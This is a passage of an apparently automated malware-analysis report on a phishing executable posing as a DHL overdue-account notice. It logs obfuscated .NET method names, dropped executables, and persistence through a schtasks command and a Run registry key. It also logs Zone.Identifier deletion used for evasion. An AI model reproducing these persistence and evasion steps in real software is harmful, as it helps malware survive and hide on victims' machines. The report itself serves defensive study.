                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, Y5gZfkJXWveVrlnV3i.csHigh entropy of concatenated method names: 'KI2u9A8Ee6', 'UsiuTAtGc3', 'NRouL1N21d', 'PEluPZkRxb', 'nILuxD6fud', 'E6HuBK5aaZ', 'UOauYJGDYt', 'rCxuHaTyIk', 'j4dud7gA5b', 'kmXutJn61N'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, gtcrRxH52rIVWQSJlQ.csHigh entropy of concatenated method names: 'dWLN5yvta7', 'x3FNubpG1Y', 'kLiNmIKfHf', 'AnkNMiKces', 'NaGN8fHRF5', 'vGMNEuopwH', 'cExNq0w6O8', 'GFhNywZpf3', 'gBFNpWq9i5', 'k2hNXwnxqG'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, kCEvdfBXVjP5RGAHJe.csHigh entropy of concatenated method names: 'p87FHcClqE', 'DVtFt9xnlK', 'IFpNwkVdMQ', 'pU2Nsgl2dT', 'lmdFWaQc8q', 'WskFR4KPOx', 'D7YFhY4jBp', 'jWDF9KWUXL', 'CFqFT0JHa2', 'z61FLWotUB'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, mjuNBZ1EFXVl4IlIcE.csHigh entropy of concatenated method names: 'HkME4ISx4C', 'JC7Erlh785', 'WMZEl7wyPU', 'zA6E6HOKxo', 'duZEjeEoW6', 'nrFEfYi7Ry', 'VWNEbuHh1F', 'gIGEJlMLqf', 'BYbEcU14x9', 'eNFEkp0JYl'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, hDQ0TDdW0HH4oWZIbA.csHigh entropy of concatenated method names: 'aX6NVnPpyU', 'Rg7NefD9KN', 'v5bNSqp0sq', 'InjNIkj3Rb', 'ShFN9kNVyG', 'PQgNA5jsBg', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.7350000.8.raw.unpack, pN8dXwurL9ll7OKPvM.csHigh entropy of concatenated method names: 'Dispose', 'WDIsdbbauQ', 'X1pgeyy5IM', 'hjg22Wh0Qv', 'KutstcrRx5', 'trIszVWQSJ', 'ProcessDialogKey', 'zQMgwDQ0TD', 'O0HgsH4oWZ', 'IbAggwUXYC'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.3a79970.3.raw.unpack, V4uC3Iifq56IKQcfry.csHigh entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.3a79970.3.raw.unpack, vpednoN8EZgsJ4TDwx.csHigh entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.71f0000.6.raw.unpack, V4uC3Iifq56IKQcfry.csHigh entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
                      Source: 1.2.DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exe.71f0000.6.raw.unpack, vpednoN8EZgsJ4TDwx.csHigh entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeFile created: \dhl - overdue account notice - 1301669350.exe
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeFile created: \dhl - overdue account notice - 1301669350.exe
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeFile created: \dhl - overdue account notice - 1301669350.exe
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeFile created: \dhl - overdue account notice - 1301669350.exe
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeFile created: \dhl - overdue account notice - 1301669350.exe
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeFile created: \dhl - overdue account notice - 1301669350.exeJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeFile created: \dhl - overdue account notice - 1301669350.exeJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeFile created: \dhl - overdue account notice - 1301669350.exeJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeFile created: \dhl - overdue account notice - 1301669350.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\boqXv\boqXv.exeJump to dropped file
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeFile created: C:\Users\user\AppData\Roaming\LJAGvecDW.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LJAGvecDW" /XML "C:\Users\user\AppData\Local\Temp\tmp87CB.tmp"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run boqXvJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run boqXvJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\boqXv\boqXv.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\DHL - OVERDUE ACCOUNT NOTICE - 1301669350.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
